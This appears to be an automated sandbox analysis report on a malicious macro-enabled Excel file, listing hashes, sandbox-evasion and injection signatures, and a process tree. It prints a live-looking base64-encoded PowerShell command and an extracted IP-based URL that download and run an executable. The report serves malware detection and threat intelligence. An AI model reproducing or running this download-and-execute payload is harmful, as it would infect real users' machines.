Analysis
-
max time kernel
133s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 22:32
Static task
static1
Behavioral task
behavioral1
Sample
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Resource
win10v2004-20241007-en
General
-
Target
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
-
Size
14KB
-
MD5
70820ac2bb527bb0a10747a06d2c2b0b
-
SHA1
7289b7ddcdcaa9450c27e1579f36d67a544cee80
-
SHA256
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753
-
SHA512
64be67485be70ac5aa2539a88c9846282d7178e13a46895d4686ff0ce79378bf9ed4ee7bec00cb88abc0e2e8bb41a9b9ef38aa4ff25b4e4dc6334a96ad1ee4b5
-
SSDEEP
384:A0z+vPw85+pkQ1z7fMc+8Pty4jZwENYBp7zMLmh:p+3ZgkKzDMCXjZwENmdKk
Malware Config
Extracted
http://84.252.122.205/xcx/system.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4304 396 cmd.exe 82 -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1908 powershell.exe -
Deletes itself 1 IoCs
pid Process 396 EXCEL.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\CBB75E00\:Zone.Identifier:$DATA EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 396 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1908 powershell.exe 1908 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1908 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 396 EXCEL.EXE 396 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 396 EXCEL.EXE 396 EXCEL.EXE 396 EXCEL.EXE 396 EXCEL.EXE 396 EXCEL.EXE 396 EXCEL.EXE 396 EXCEL.EXE 396 EXCEL.EXE 396 EXCEL.EXE 396 EXCEL.EXE 396 EXCEL.EXE 396 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 396 wrote to memory of 4304 396 EXCEL.EXE 84 PID 396 wrote to memory of 4304 396 EXCEL.EXE 84 PID 4304 wrote to memory of 1908 4304 cmd.exe 86 PID 4304 wrote to memory of 1908 4304 cmd.exe 86
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm"1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Cxrgbutjpc.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBCAGUAeABzAGMAbwB5AGEAcABhAHIAYwB5AGgAbgBmAHkALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwA4ADQALgAyADUAMgAuADEAMgAyAC4AMgAwADUALwB4AGMAeAAvAHMAeQBzAHQAZQBtAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD537a9a5f09363b1dc454e5b25a6b8987f
SHA114a03b0b848ad050ea4695afb675ee12bf0ef356
SHA256710bd0d11aceee2119bc3fd61bfc20e32e7d3503d864a1d927bfb89670f04e4f
SHA512ca184538fe75528b9fd2c2fd733653d1d5b0f885f598b4141c70c108dfcb459e1c0e41607abd0896409709f067196dec6583ced5f1fa941c7580271e9761538d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5ccbd8bf6fbf1c244343b9df87b99667b
SHA13d42ddd2295e58f3b6ef449c1a96f01c9e7536d6
SHA2567405c5446bf82088b1ae0525a11f810d6e78e8dbcc9af03b8fc4e7083c9bd8a4
SHA512f71a69dc877f7603272264adfced815a5571ded666bf431e0668af2c3abb5ee93f56dfe64cc0f7c9ebe0f2e65a6159b601d20be42b7fdb9f4dcdbfee23fa772e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD59ae67225ac461c1c8f8152b4155d71aa
SHA15af72ad52f6aeef3668a90b94ca399fa3b31b744
SHA256799030b52f65e2c223184be15c593499e8ba8e2e39440118515e3408ff769ea0
SHA51229ac6ef0a69c65e4f7cda186d2e4cd692853bf9b7944701f7bbb73316357776f0439bd9ce2a871334e7f6d60435b820c34f2fb5e81ffb2ef93b668947844d951
-
Filesize
587B
MD531814477e987cc1e94638caa7f39f293
SHA1c3814edcc331117303ced19f53006a4ecd09a833
SHA256de24fa627ca42edfb1e5b46804f6dd0ed41fbcbd900eeeb56abc5cb34c1cadd4
SHA51209a06a533d82dc086c345bd1c5ca92b2d582964c963b89e6e0c11c784effe9e4ecfc5e05f2bd3571437a04bead7c2d9fc053bd82538be17a23a473dc949fc268